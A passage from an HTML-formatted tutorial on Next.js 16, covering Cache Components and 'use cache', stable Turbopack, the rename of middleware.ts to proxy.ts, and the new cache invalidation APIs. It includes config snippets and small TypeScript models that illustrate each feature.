&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  2. Cache Components — ending implicit caching with use cache
&lt;/h2&gt;

&lt;p&gt;This is 16's biggest paradigm shift. The previous App Router inferred "should this page be static or dynamic"; in 16, &lt;strong&gt;all dynamic code executes at request time by default&lt;/strong&gt;, and you attach &lt;code&gt;"use cache"&lt;/code&gt; only to the pages, components, or functions you want cached. The compiler auto-generates a cache key wherever &lt;code&gt;"use cache"&lt;/code&gt; appears, reducing manual-key mistakes.&lt;/p&gt;
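&lt;p&gt;The sketch below makes the idea of a compiler-generated cache key concrete. It is plain TypeScript and assumes the key is derived from a function identifier plus the function's serialized arguments. The &lt;code&gt;withCache&lt;/code&gt; and &lt;code&gt;cacheKey&lt;/code&gt; helpers are hypothetical. They only model the behavior and are not how Next.js actually generates keys.&lt;/p&gt;

```typescript
// Hypothetical model of "use cache" key derivation: key = function id + serialized args.
// Illustrative only; this is not how Next.js builds its cache keys.

type AnyFn = (...args: any[]) => unknown;

// In-memory store standing in for the framework's cache.
const store = new Map();

function cacheKey(fnId: string, args: unknown[]): string {
  // Arguments must serialize deterministically for the key to be stable.
  return fnId + ":" + JSON.stringify(args);
}

function withCache(fnId: string, fn: AnyFn): AnyFn {
  return (...args: unknown[]) => {
    const key = cacheKey(fnId, args);
    if (store.has(key)) return store.get(key); // hit: skip the work
    const value = fn(...args);                 // miss: compute once
    store.set(key, value);
    return value;
  };
}

// Usage: the repeated "en" call is served from the store.
let calls = 0;
const getCatalogMeta = withCache("catalog#getCatalogMeta", (locale: string) => {
  calls += 1;
  return { title: "Catalog (" + locale + ")" };
});

getCatalogMeta("en");
getCatalogMeta("en");
getCatalogMeta("ko");
console.log(calls); // 2
```

&lt;p&gt;In this model, each distinct argument combination gets its own entry. That is why the arguments passed into a cached function need to be serializable.&lt;/p&gt;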

&lt;p&gt;Enabling it is one line in &lt;code&gt;next.config.ts&lt;/code&gt;. The old &lt;code&gt;experimental.dynamicIO&lt;/code&gt; is renamed &lt;code&gt;cacheComponents&lt;/code&gt;, and the &lt;code&gt;experimental.ppr&lt;/code&gt; flag is removed and absorbed into this model.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// next.config.ts&lt;/span&gt;
&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;nextConfig&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="na"&gt;cacheComponents&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="k"&gt;default&lt;/span&gt; &lt;span class="nx"&gt;nextConfig&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;In practice you declare the directive at the top of a function, component, or file. Combined with PPR (Partial Prerendering), the cached static shell streams immediately, and dynamic parts stream in afterward through Suspense boundaries.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// app/products/page.tsx&lt;/span&gt;
&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;Suspense&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;react&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="c1"&gt;// Statically cached header — rendered once&lt;/span&gt;
&lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;ProductHeader&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;use cache&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;meta&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nf"&gt;getCatalogMeta&lt;/span&gt;&lt;span class="p"&gt;();&lt;/span&gt;
  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;h2&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nx"&gt;meta&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;title&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="sr"&gt;/h2&amp;gt;&lt;/span&gt;&lt;span class="err"&gt;;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="c1"&gt;// Dynamic — runs on every request&lt;/span&gt;
&lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;LivePrice&lt;/span&gt;&lt;span class="p"&gt;({&lt;/span&gt; &lt;span class="nx"&gt;id&lt;/span&gt; &lt;span class="p"&gt;}:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nl"&gt;id&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kr"&gt;string&lt;/span&gt; &lt;span class="p"&gt;})&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;price&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nf"&gt;getRealtimePrice&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;id&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;span&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="nx"&gt;price&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="sr"&gt;/span&amp;gt;&lt;/span&gt;&lt;span class="err"&gt;;
&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;

&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="k"&gt;default&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;Page&lt;/span&gt;&lt;span class="p"&gt;()&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;return &lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;
    &lt;span class="o"&gt;&amp;lt;&amp;gt;&lt;/span&gt;
      &lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;ProductHeader&lt;/span&gt; &lt;span class="o"&gt;/&amp;gt;&lt;/span&gt;
      &lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;Suspense&lt;/span&gt; &lt;span class="nx"&gt;fallback&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="p"&gt;{&lt;/span&gt;&lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;PriceSkeleton&lt;/span&gt; &lt;span class="o"&gt;/&amp;gt;&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="o"&gt;&amp;gt;&lt;/span&gt;
        &lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="nx"&gt;LivePrice&lt;/span&gt; &lt;span class="nx"&gt;id&lt;/span&gt;&lt;span class="o"&gt;=&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt;&lt;span class="s2"&gt;42&lt;/span&gt;&lt;span class="dl"&gt;"&lt;/span&gt; &lt;span class="o"&gt;/&amp;gt;&lt;/span&gt;
      &lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="sr"&gt;/Suspense&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;
&lt;/span&gt;    &lt;span class="o"&gt;&amp;lt;&lt;/span&gt;&lt;span class="sr"&gt;/&lt;/span&gt;&lt;span class="err"&gt;&amp;gt;
&lt;/span&gt;  &lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
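&lt;p&gt;The streaming order behind the example above can be modeled with an async generator. The model assumes a simplified renderer that emits the cached shell first and the dynamic chunk later. &lt;code&gt;renderPage&lt;/code&gt; and &lt;code&gt;fetchLivePrice&lt;/code&gt; are hypothetical stand-ins, not Next.js APIs.&lt;/p&gt;

```typescript
// Hypothetical model of Partial Prerendering's streaming order:
// the cached shell (with fallbacks) goes out first, dynamic chunks follow.

const staticShell = "[ProductHeader] [PriceSkeleton]"; // prerendered and cached

async function fetchLivePrice(id: string) {
  // Stand-in for a per-request data source (hypothetical).
  return "price for " + id + ": 19.99";
}

async function* renderPage(id: string) {
  yield staticShell;                      // sent immediately
  const price = await fetchLivePrice(id); // resolved at request time
  yield "[LivePrice replaces PriceSkeleton] " + price;
}

async function main() {
  const chunks: string[] = [];
  for await (const chunk of renderPage("42")) {
    chunks.push(chunk);
    console.log(chunk);
  }
  return chunks;
}

main();
```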



&lt;p&gt;As a bonus, when &lt;code&gt;cacheComponents&lt;/code&gt; is on, client navigation preserves the previous route's state via React's &lt;code&gt;&amp;lt;Activity&amp;gt;&lt;/code&gt;. Leaving a route sets it to "hidden" rather than unmounting, so going back restores scroll and input state. Effects are cleaned up when hidden and recreated when visible again.&lt;/p&gt;
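&lt;p&gt;Here is a rough model of the hide-instead-of-unmount behavior, written in plain TypeScript rather than React. Each route keeps its state object while hidden, and only its effect is torn down and recreated. &lt;code&gt;navigate&lt;/code&gt;, &lt;code&gt;runEffect&lt;/code&gt; and the route map are illustrative assumptions.&lt;/p&gt;

```typescript
// Hypothetical model of Activity-style route preservation (plain TypeScript, not React):
// leaving a route hides it instead of unmounting it, so its state object survives;
// its effect is cleaned up on hide and re-run on show.

type Mode = "visible" | "hidden";

interface RouteInstance {
  mode: Mode;
  state: { scrollY: number; draft: string };
  cleanup: (() => void) | null;
}

const log: string[] = [];
const routes = new Map(); // path -> RouteInstance

function runEffect(path: string) {
  log.push("effect start " + path);
  return () => {
    log.push("effect cleanup " + path);
  };
}

function navigate(from: string | null, to: string): RouteInstance {
  if (from !== null) {
    const prev: RouteInstance | undefined = routes.get(from);
    if (prev) {
      prev.mode = "hidden";             // hidden, not unmounted: state is kept
      if (prev.cleanup) prev.cleanup(); // effects are torn down while hidden
      prev.cleanup = null;
    }
  }
  let next: RouteInstance | undefined = routes.get(to);
  if (!next) {
    next = { mode: "visible", state: { scrollY: 0, draft: "" }, cleanup: null };
    routes.set(to, next);
  }
  next.mode = "visible";
  next.cleanup = runEffect(to); // effects are recreated when visible again
  return next;
}

// Usage: type into /settings, go to /home, then come back.
const settings = navigate(null, "/settings");
settings.state.draft = "hello";
settings.state.scrollY = 480;
navigate("/settings", "/home");
const back = navigate("/home", "/settings");
console.log(back.state.draft, back.state.scrollY); // hello 480
```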

&lt;h2&gt;
  
  
  3. Turbopack stable — default bundler + filesystem caching
&lt;/h2&gt;

&lt;p&gt;Turbopack, the Rust-based bundler replacing Webpack, is &lt;strong&gt;stable&lt;/strong&gt; in 16 for both dev and production builds and is now the default for new projects. During the beta, 50%+ of dev sessions and 20%+ of production builds on Next.js 15.3+ were already on Turbopack.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Metric&lt;/th&gt;
&lt;th&gt;Improvement&lt;/th&gt;
&lt;th&gt;Note&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;Production builds&lt;/td&gt;
&lt;td&gt;2–5× faster&lt;/td&gt;
&lt;td&gt;Zero-config default&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Fast Refresh&lt;/td&gt;
&lt;td&gt;up to 10× faster&lt;/td&gt;
&lt;td&gt;Most noticeable on large apps&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Dev startup (16.2)&lt;/td&gt;
&lt;td&gt;~87% faster vs 16.1&lt;/td&gt;
&lt;td&gt;Default app&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;

&lt;p&gt;If you depend on a custom Webpack setup, the &lt;code&gt;--webpack&lt;/code&gt; flag keeps Webpack in use. For large monorepos, beta filesystem caching persists compiler artifacts to disk so they survive dev-server restarts, which speeds up startup further.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight shell"&gt;&lt;code&gt;&lt;span class="c"&gt;# Keep Webpack during the migration window&lt;/span&gt;
next dev &lt;span class="nt"&gt;--webpack&lt;/span&gt;
next build &lt;span class="nt"&gt;--webpack&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;





&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// next.config.ts — dev filesystem caching (beta) for large apps&lt;/span&gt;
&lt;span class="kd"&gt;const&lt;/span&gt; &lt;span class="nx"&gt;nextConfig&lt;/span&gt; &lt;span class="o"&gt;=&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="na"&gt;experimental&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
    &lt;span class="na"&gt;turbopackFileSystemCacheForDev&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kc"&gt;true&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt;
  &lt;span class="p"&gt;},&lt;/span&gt;
&lt;span class="p"&gt;};&lt;/span&gt;

&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="k"&gt;default&lt;/span&gt; &lt;span class="nx"&gt;nextConfig&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
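&lt;p&gt;Conceptually, a persistent compile cache keys each output by a hash of its input. After a restart, unchanged modules are read back instead of being recompiled. The sketch below assumes FNV-1a as the hash and uses a &lt;code&gt;Map&lt;/code&gt; as a stand-in for the disk. Turbopack's real cache format and invalidation rules are not modeled here.&lt;/p&gt;

```typescript
// Hypothetical model of a persistent compile cache: each output is keyed by a
// hash of its source, so unchanged modules are reused after a restart.
// A Map stands in for the on-disk store; this is not Turbopack's format.

function fnv1a(text: string): string {
  // 32-bit FNV-1a, one code unit per character (fine for this ASCII demo).
  let hash = 0x811c9dc5;
  for (const ch of text) {
    hash ^= ch.charCodeAt(0);
    hash = Math.imul(hash, 0x01000193) >>> 0;
  }
  return hash.toString(16);
}

const diskCache = new Map(); // stands in for files in a cache directory
let compiles = 0;

function compile(source: string): string {
  compiles += 1; // the expensive step we want to skip
  return "compiled(" + source.length + " chars)";
}

function build(modules: string[]): string[] {
  return modules.map((src) => {
    const key = fnv1a(src);
    const hit = diskCache.get(key);
    if (hit !== undefined) return hit; // reuse the persisted artifact
    const out = compile(src);
    diskCache.set(key, out);
    return out;
  });
}

// Session 1 compiles both modules; after a "restart" only the edited one recompiles.
build(["export const a = 1;", "export const b = 2;"]);
build(["export const a = 1;", "export const b = 3;"]);
console.log(compiles); // 3
```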



&lt;h2&gt;
  
  
  4. proxy.ts — the end of middleware.ts and a clearer network boundary
&lt;/h2&gt;

&lt;p&gt;16 renames &lt;code&gt;middleware.ts&lt;/code&gt; to &lt;strong&gt;&lt;code&gt;proxy.ts&lt;/code&gt;&lt;/strong&gt;. The API and matcher are identical; just rename the exported function to &lt;code&gt;proxy&lt;/code&gt;. The reason is identity: this file is a &lt;em&gt;request-time proxy that intercepts requests in front of the cache&lt;/em&gt;, not just "auth middleware," and it runs on the Node.js runtime. &lt;code&gt;middleware.ts&lt;/code&gt; remains available for Edge runtime use cases for now, but it is deprecated and slated for removal.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="c1"&gt;// proxy.ts (formerly middleware.ts) — runs on the Node.js runtime&lt;/span&gt;
&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;NextRequest&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;NextResponse&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;next/server&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="k"&gt;default&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;proxy&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;request&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;NextRequest&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;return&lt;/span&gt; &lt;span class="nx"&gt;NextResponse&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;redirect&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="k"&gt;new&lt;/span&gt; &lt;span class="nc"&gt;URL&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;/home&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;request&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;url&lt;/span&gt;&lt;span class="p"&gt;));&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;
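&lt;p&gt;The ordering that gives the file its new name can be sketched as a tiny request pipeline. The proxy step runs before the cache lookup, so a redirect applies even to routes that are already cached. &lt;code&gt;handle&lt;/code&gt;, &lt;code&gt;proxyStep&lt;/code&gt; and &lt;code&gt;pageCache&lt;/code&gt; are hypothetical names used only for this illustration.&lt;/p&gt;

```typescript
// Hypothetical request pipeline: the proxy runs before the cache lookup,
// so its decisions apply even to routes that are already cached.

type Result =
  | { kind: "redirect"; location: string }
  | { kind: "page"; body: string; fromCache: boolean };

const pageCache = new Map(); // path -> rendered HTML

function proxyStep(path: string): string | null {
  // Example rule (hypothetical): send anything under /old to /home.
  if (path.startsWith("/old")) return "/home";
  return null;
}

function handle(path: string): Result {
  const redirectTo = proxyStep(path); // 1) proxy first
  if (redirectTo !== null) return { kind: "redirect", location: redirectTo };
  const cached = pageCache.get(path); // 2) then the cache
  if (cached !== undefined) return { kind: "page", body: cached, fromCache: true };
  const body = "rendered " + path;    // 3) then rendering
  pageCache.set(path, body);
  return { kind: "page", body, fromCache: false };
}

pageCache.set("/old/pricing", "stale cached page");
console.log(handle("/old/pricing").kind); // redirect (the cache entry is never reached)
```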



&lt;p&gt;Migration is trivial: move &lt;code&gt;middleware.ts&lt;/code&gt; → &lt;code&gt;proxy.ts&lt;/code&gt;, rename the export to &lt;code&gt;proxy&lt;/code&gt;, and the logic stays the same.&lt;/p&gt;

&lt;h2&gt;
  
  
  5. Improved caching APIs — revalidateTag, updateTag, refresh
&lt;/h2&gt;

&lt;p&gt;To match the Cache Components model, cache invalidation is organized into three APIs. You choose among them explicitly by intent: &lt;strong&gt;SWR, read-your-writes, or refreshing uncached data&lt;/strong&gt;.&lt;/p&gt;

&lt;div class="table-wrapper-paragraph"&gt;&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;API&lt;/th&gt;
&lt;th&gt;Use&lt;/th&gt;
&lt;th&gt;Semantics&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;revalidateTag(tag, profile)&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Invalidate tagged cache&lt;/td&gt;
&lt;td&gt;SWR — serve stale immediately, revalidate in background&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;updateTag(tag)&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Server Actions only&lt;/td&gt;
&lt;td&gt;read-your-writes — fresh data within the same request&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;&lt;code&gt;refresh()&lt;/code&gt;&lt;/td&gt;
&lt;td&gt;Server Actions only&lt;/td&gt;
&lt;td&gt;refresh uncached data only&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;&lt;/div&gt;
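&lt;p&gt;The difference between the first two rows can be modeled in a few lines. The model assumes an in-memory store. &lt;code&gt;markStale&lt;/code&gt; plays the role of SWR-style invalidation, and &lt;code&gt;expireNow&lt;/code&gt; plays the role of read-your-writes. Both functions are hypothetical: they mirror the semantics described in the table, not the &lt;code&gt;next/cache&lt;/code&gt; internals.&lt;/p&gt;

```typescript
// Hypothetical model of two invalidation styles (not next/cache internals):
//  markStale -> SWR: next read returns the old value and queues a background refresh
//  expireNow -> read-your-writes: next read fetches fresh data immediately

interface Entry {
  value: string;
  stale: boolean;
}

let source = "v1";                 // the "database"
const entries = new Map();         // tag -> Entry
const backgroundJobs: (() => void)[] = [];

function read(tag: string): string {
  const hit: Entry | undefined = entries.get(tag);
  if (hit === undefined) {
    entries.set(tag, { value: source, stale: false });
    return source;
  }
  if (hit.stale) {
    // Serve stale now, refresh later.
    backgroundJobs.push(() => entries.set(tag, { value: source, stale: false }));
  }
  return hit.value;
}

function markStale(tag: string) {
  const hit: Entry | undefined = entries.get(tag);
  if (hit) hit.stale = true;
}

function expireNow(tag: string) {
  entries.delete(tag);
}

function flushBackground() {
  for (const job of backgroundJobs.splice(0)) job();
}

// Usage
read("profile");                      // caches "v1"
source = "v2";
markStale("profile");
const afterSwr = read("profile");     // stale value served immediately
flushBackground();
const afterRefresh = read("profile"); // background refresh has landed
source = "v3";
expireNow("profile");
const afterUpdate = read("profile");  // fresh on the very next read
console.log(afterSwr, afterRefresh, afterUpdate); // v1 v2 v3
```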

&lt;p&gt;The biggest change: &lt;code&gt;revalidateTag&lt;/code&gt; now takes &lt;strong&gt;a &lt;code&gt;cacheLife&lt;/code&gt; profile as its second argument&lt;/strong&gt;. The single-argument form still works but is deprecated. &lt;code&gt;'max'&lt;/code&gt; is recommended for most long-lived content.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;revalidateTag&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;next/cache&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="c1"&gt;// ✅ Built-in profile ('max' recommended — background revalidation)&lt;/span&gt;
&lt;span class="nf"&gt;revalidateTag&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;blog-posts&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;max&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="nf"&gt;revalidateTag&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;news-feed&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;hours&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;

&lt;span class="c1"&gt;// Inline object for custom expiry&lt;/span&gt;
&lt;span class="nf"&gt;revalidateTag&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;products&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="na"&gt;expire&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="mi"&gt;3600&lt;/span&gt; &lt;span class="p"&gt;});&lt;/span&gt;

&lt;span class="c1"&gt;// ⚠️ Note: single-argument form is deprecated&lt;/span&gt;
&lt;span class="c1"&gt;// revalidateTag('blog-posts');&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;p&gt;For "the user must see their own change instantly" cases — form/settings saves — use &lt;code&gt;updateTag&lt;/code&gt; inside a Server Action. To refresh only uncached dynamic values like a notification count, use &lt;code&gt;refresh&lt;/code&gt;.&lt;br&gt;
&lt;/p&gt;

&lt;div class="highlight js-code-highlight"&gt;
&lt;pre class="highlight typescript"&gt;&lt;code&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;use server&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;
&lt;span class="k"&gt;import&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt; &lt;span class="nx"&gt;updateTag&lt;/span&gt; &lt;span class="p"&gt;}&lt;/span&gt; &lt;span class="k"&gt;from&lt;/span&gt; &lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="s1"&gt;next/cache&lt;/span&gt;&lt;span class="dl"&gt;'&lt;/span&gt;&lt;span class="p"&gt;;&lt;/span&gt;

&lt;span class="k"&gt;export&lt;/span&gt; &lt;span class="k"&gt;async&lt;/span&gt; &lt;span class="kd"&gt;function&lt;/span&gt; &lt;span class="nf"&gt;updateUserProfile&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;userId&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="kr"&gt;string&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;profile&lt;/span&gt;&lt;span class="p"&gt;:&lt;/span&gt; &lt;span class="nx"&gt;Profile&lt;/span&gt;&lt;span class="p"&gt;)&lt;/span&gt; &lt;span class="p"&gt;{&lt;/span&gt;
  &lt;span class="k"&gt;await&lt;/span&gt; &lt;span class="nx"&gt;db&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nx"&gt;users&lt;/span&gt;&lt;span class="p"&gt;.&lt;/span&gt;&lt;span class="nf"&gt;update&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="nx"&gt;userId&lt;/span&gt;&lt;span class="p"&gt;,&lt;/span&gt; &lt;span class="nx"&gt;profile&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
  &lt;span class="c1"&gt;// Expire + re-read immediately → user sees the change right away&lt;/span&gt;
  &lt;span class="nf"&gt;updateTag&lt;/span&gt;&lt;span class="p"&gt;(&lt;/span&gt;&lt;span class="s2"&gt;`user-&lt;/span&gt;&lt;span class="p"&gt;${&lt;/span&gt;&lt;span class="nx"&gt;userId&lt;/span&gt;&lt;span class="p"&gt;}&lt;/span&gt;&lt;span class="s2"&gt;`&lt;/span&gt;&lt;span class="p"&gt;);&lt;/span&gt;
&lt;span class="p"&gt;}&lt;/span&gt;
&lt;/code&gt;&lt;/pre&gt;

&lt;/div&gt;



&lt;h2&gt;
  
  
  6. React 19.2 + React Compiler — View Transitions, Activity, automatic memoization
&lt;/h2&gt;

&lt;p&gt;16's App Router runs on the latest React Canary and includes React 19.2 features. Three you'll feel in production:&lt;/p&gt;

